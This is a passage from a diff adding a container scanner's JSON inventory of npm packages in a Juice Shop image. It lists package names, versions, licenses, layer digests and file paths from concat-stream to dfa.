"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/concat-stream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "config@3.3.12", + "Name": "config", + "Identifier": { + "PURL": "pkg:npm/config@3.3.12", + "UID": "1380e0e8e6fde1eb" + }, + "Version": "3.3.12", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/config/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "console-control-strings@1.1.0", + "Name": "console-control-strings", + "Identifier": { + "PURL": "pkg:npm/console-control-strings@1.1.0", + "UID": "add73026b77cec73" + }, + "Version": "1.1.0", + "Licenses": [ + "ISC" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/console-control-strings/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "constantinople@4.0.1", + "Name": "constantinople", + "Identifier": { + "PURL": "pkg:npm/constantinople@4.0.1", + "UID": "e497815d70735541" + }, + "Version": "4.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/constantinople/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "content-disposition@0.5.4", + "Name": "content-disposition", + "Identifier": { + "PURL": "pkg:npm/content-disposition@0.5.4", + "UID": "6bb3d31a6261e13e" + }, + "Version": "0.5.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/content-disposition/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "content-type@1.0.5", + "Name": "content-type", + "Identifier": { + "PURL": "pkg:npm/content-type@1.0.5", + "UID": "a1da0017cce8f7d7" + }, + "Version": "1.0.5", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/content-type/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "cookie@0.4.2", + "Name": "cookie", + "Identifier": { + "PURL": "pkg:npm/cookie@0.4.2", + "UID": "f53e13c80d501e26" + }, + "Version": "0.4.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/engine.io/node_modules/cookie/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "cookie@0.7.2", + "Name": "cookie", + "Identifier": { + "PURL": "pkg:npm/cookie@0.7.2", + "UID": "752a620fa59bcf5f" + }, + "Version": "0.7.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/cookie/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "cookie-parser@1.4.7", + "Name": "cookie-parser", + "Identifier": { + "PURL": "pkg:npm/cookie-parser@1.4.7", + "UID": "fea9eb319ab1730d" + }, + "Version": "1.4.7", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/cookie-parser/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "cookie-signature@1.0.6", + "Name": "cookie-signature", + "Identifier": { + "PURL": "pkg:npm/cookie-signature@1.0.6", + "UID": "db6e2d5bc708e791" + }, + "Version": "1.0.6", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/cookie-signature/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "cookieconsent@3.1.1", + "Name": "cookieconsent", + "Identifier": { + "PURL": "pkg:npm/cookieconsent@3.1.1", + "UID": "2d734677c71c68a5" + }, + "Version": "3.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/cookieconsent/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "core-util-is@1.0.2", + "Name": "core-util-is", + "Identifier": { + "PURL": "pkg:npm/core-util-is@1.0.2", + "UID": "f37d87558dafc02f" + }, + "Version": "1.0.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/core-util-is/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "cors@2.8.6", + "Name": "cors", + "Identifier": { + "PURL": "pkg:npm/cors@2.8.6", + "UID": "d48b1a3cbb5a341e" + }, + "Version": "2.8.6", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/cors/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "crc@3.8.0", + "Name": "crc", + "Identifier": { + "PURL": "pkg:npm/crc@3.8.0", + "UID": "47b51eb9dc7841ce" + }, + "Version": "3.8.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/crc/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "crc32-stream@2.0.0", + "Name": "crc32-stream", + "Identifier": { + "PURL": "pkg:npm/crc32-stream@2.0.0", + "UID": "6a31427f13adc004" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/crc32-stream/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "cross-spawn@7.0.6", + "Name": "cross-spawn", + "Identifier": { + "PURL": "pkg:npm/cross-spawn@7.0.6", + "UID": "e9da877f8ab2a81c" + }, + "Version": "7.0.6", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/cross-spawn/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "crypto-js@3.3.0", + "Name": "crypto-js", + "Identifier": { + "PURL": "pkg:npm/crypto-js@3.3.0", + "UID": "db05eff811a3ecbf" + }, + "Version": "3.3.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/crypto-js/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "dateformat@4.6.3", + "Name": "dateformat", + "Identifier": { + "PURL": "pkg:npm/dateformat@4.6.3", + "UID": "10355f6cf5040b8f" + }, + "Version": "4.6.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/dateformat/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "debug@2.6.9", + "Name": "debug", + "Identifier": { + "PURL": "pkg:npm/debug@2.6.9", + "UID": "98f83f0b7cd8f4f9" + }, + "Version": "2.6.9", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/debug/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "debug@3.2.7", + "Name": "debug", + "Identifier": { + "PURL": "pkg:npm/debug@3.2.7", + "UID": "90386bf203194153" + }, + "Version": "3.2.7", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/needle/node_modules/debug/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "debug@4.3.7", + "Name": "debug", + "Identifier": { + "PURL": "pkg:npm/debug@4.3.7", + "UID": "b5f7149b7b72a4a9" + }, + "Version": "4.3.7", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/engine.io/node_modules/debug/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "debug@4.3.7", + "Name": "debug", + "Identifier": { + "PURL": "pkg:npm/debug@4.3.7", + "UID": "366abd0853e66556" + }, + "Version": "4.3.7", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/socket.io-parser/node_modules/debug/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "debug@4.3.7", + "Name": "debug", + "Identifier": { + "PURL": "pkg:npm/debug@4.3.7", + "UID": "201dc02252a24cf1" + }, + "Version": "4.3.7", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/socket.io/node_modules/debug/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "debug@4.4.3", + "Name": "debug", + "Identifier": { + "PURL": "pkg:npm/debug@4.4.3", + "UID": "53ea0937079ae78e" + }, + "Version": "4.4.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/http-proxy-agent/node_modules/debug/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "debug@4.4.3", + "Name": "debug", + "Identifier": { + "PURL": "pkg:npm/debug@4.4.3", + "UID": "b516d5bffe366503" + }, + "Version": "4.4.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/https-proxy-agent/node_modules/debug/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "debug@4.4.3", + "Name": "debug", + "Identifier": { + "PURL": "pkg:npm/debug@4.4.3", + "UID": "6d28017158190e4c" + }, + "Version": "4.4.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sequelize/node_modules/debug/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "debug@4.4.3", + "Name": "debug", + "Identifier": { + "PURL": "pkg:npm/debug@4.4.3", + "UID": "3d49bc458c831628" + }, + "Version": "4.4.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/socks-proxy-agent/node_modules/debug/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "debug@4.4.3", + "Name": "debug", + "Identifier": { + "PURL": "pkg:npm/debug@4.4.3", + "UID": "42f30c052d4644df" + }, + "Version": "4.4.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/debug/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "decamelize@1.2.0", + "Name": "decamelize", + "Identifier": { + "PURL": "pkg:npm/decamelize@1.2.0", + "UID": "2e9e0978d79c0d6b" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/decamelize/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "decode-uri-component@0.2.2", + "Name": "decode-uri-component", + "Identifier": { + "PURL": "pkg:npm/decode-uri-component@0.2.2", + "UID": "437b2b47b802286a" + }, + "Version": "0.2.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/decode-uri-component/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "decompress@4.2.1", + "Name": "decompress", + "Identifier": { + "PURL": "pkg:npm/decompress@4.2.1", + "UID": "35a006b691cc5b46" + }, + "Version": "4.2.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/decompress/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "decompress-response@3.3.0", + "Name": "decompress-response", + "Identifier": { + "PURL": "pkg:npm/decompress-response@3.3.0", + "UID": "ec7e8db6707fbcb7" + }, + "Version": "3.3.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/decompress-response/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "decompress-response@4.2.1", + "Name": "decompress-response", + "Identifier": { + "PURL": "pkg:npm/decompress-response@4.2.1", + "UID": "7c11c84eba32a91f" + }, + "Version": "4.2.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/simple-get/node_modules/decompress-response/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "decompress-response@6.0.0", + "Name": "decompress-response", + "Identifier": { + "PURL": "pkg:npm/decompress-response@6.0.0", + "UID": "82cce25e1d9dce6" + }, + "Version": "6.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/libxmljs2/node_modules/decompress-response/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "decompress-response@6.0.0", + "Name": "decompress-response", + "Identifier": { + "PURL": "pkg:npm/decompress-response@6.0.0", + "UID": "49a2d22eb182825f" + }, + "Version": "6.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/decompress-response/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "decompress-tar@4.1.1", + "Name": "decompress-tar", + "Identifier": { + "PURL": "pkg:npm/decompress-tar@4.1.1", + "UID": "4af82781749f9f90" + }, + "Version": "4.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/decompress-tar/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "decompress-tarbz2@4.1.1", + "Name": "decompress-tarbz2", + "Identifier": { + "PURL": "pkg:npm/decompress-tarbz2@4.1.1", + "UID": "ce35da2765c2dad6" + }, + "Version": "4.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/decompress-tarbz2/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "decompress-targz@4.1.1", + "Name": "decompress-targz", + "Identifier": { + "PURL": "pkg:npm/decompress-targz@4.1.1", + "UID": "6d3ae848ae8e9760" + }, + "Version": "4.1.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/decompress-targz/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "decompress-unzip@4.0.1", + "Name": "decompress-unzip", + "Identifier": { + "PURL": "pkg:npm/decompress-unzip@4.0.1", + "UID": "2981079d78e1bfa5" + }, + "Version": "4.0.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/decompress-unzip/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "deep-equal@2.2.3", + "Name": "deep-equal", + "Identifier": { + "PURL": "pkg:npm/deep-equal@2.2.3", + "UID": "7390b253f6bb9465" + }, + "Version": "2.2.3", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/deep-equal/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "deep-extend@0.6.0", + "Name": "deep-extend", + "Identifier": { + "PURL": "pkg:npm/deep-extend@0.6.0", + "UID": "4c8952f017baf62b" + }, + "Version": "0.6.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/deep-extend/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "define-data-property@1.1.4", + "Name": "define-data-property", + "Identifier": { + "PURL": "pkg:npm/define-data-property@1.1.4", + "UID": "10cee05e89e6bfcf" + }, + "Version": "1.1.4", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/define-data-property/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "define-properties@1.2.1", + "Name": "define-properties", + "Identifier": { + "PURL": "pkg:npm/define-properties@1.2.1", + "UID": "9e82e0028d0a5f35" + }, + "Version": "1.2.1", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/define-properties/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "delegates@1.0.0", + "Name": "delegates", + "Identifier": { + "PURL": "pkg:npm/delegates@1.0.0", + "UID": "ec1f010832cdd00b" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/delegates/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "depd@1.1.2", + "Name": "depd", + "Identifier": { + "PURL": "pkg:npm/depd@1.1.2", + "UID": "ded0c6685a710712" + }, + "Version": "1.1.2", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/serve-index/node_modules/depd/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "depd@2.0.0", + "Name": "depd", + "Identifier": { + "PURL": "pkg:npm/depd@2.0.0", + "UID": "5267378f76b7ef03" + }, + "Version": "2.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/depd/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "destroy@1.2.0", + "Name": "destroy", + "Identifier": { + "PURL": "pkg:npm/destroy@1.2.0", + "UID": "f41ccb7b7c7860f1" + }, + "Version": "1.2.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/destroy/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "detect-file@1.0.0", + "Name": "detect-file", + "Identifier": { + "PURL": "pkg:npm/detect-file@1.0.0", + "UID": "8ab369a51d4a41d6" + }, + "Version": "1.0.0", + "Licenses": [ + "MIT" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/detect-file/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "detect-libc@1.0.3", + "Name": "detect-libc", + "Identifier": { + "PURL": "pkg:npm/detect-libc@1.0.3", + "UID": "567fa3e5f7da9c2a" + }, + "Version": "1.0.3", + "Licenses": [ + "Apache-2.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/detect-libc/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "detect-libc@2.1.2", + "Name": "detect-libc", + "Identifier": { + "PURL": "pkg:npm/detect-libc@2.1.2", + "UID": "6c8116342349be72" + }, + "Version": "2.1.2", + "Licenses": [ + "Apache-2.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/libxmljs2/node_modules/detect-libc/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "detect-libc@2.1.2", + "Name": "detect-libc", + "Identifier": { + "PURL": "pkg:npm/detect-libc@2.1.2", + "UID": "60f6acc8b09ef9a3" + }, + "Version": "2.1.2", + "Licenses": [ + "Apache-2.0" + ], + "Layer": { + "Digest": "sha256:e898f81bafb2a2672409a093b18c44cd67e45e9ba53561e6fe4f7859ad6d6d9e", + "DiffID": "sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed" + }, + "FilePath": "juice-shop/node_modules/sqlite3/node_modules/detect-libc/package.json", + "AnalyzedBy": "node-pkg" + }, + { + "ID": "dfa@1.2.0", + "Name": "dfa", + "Identifier": { + "PURL": 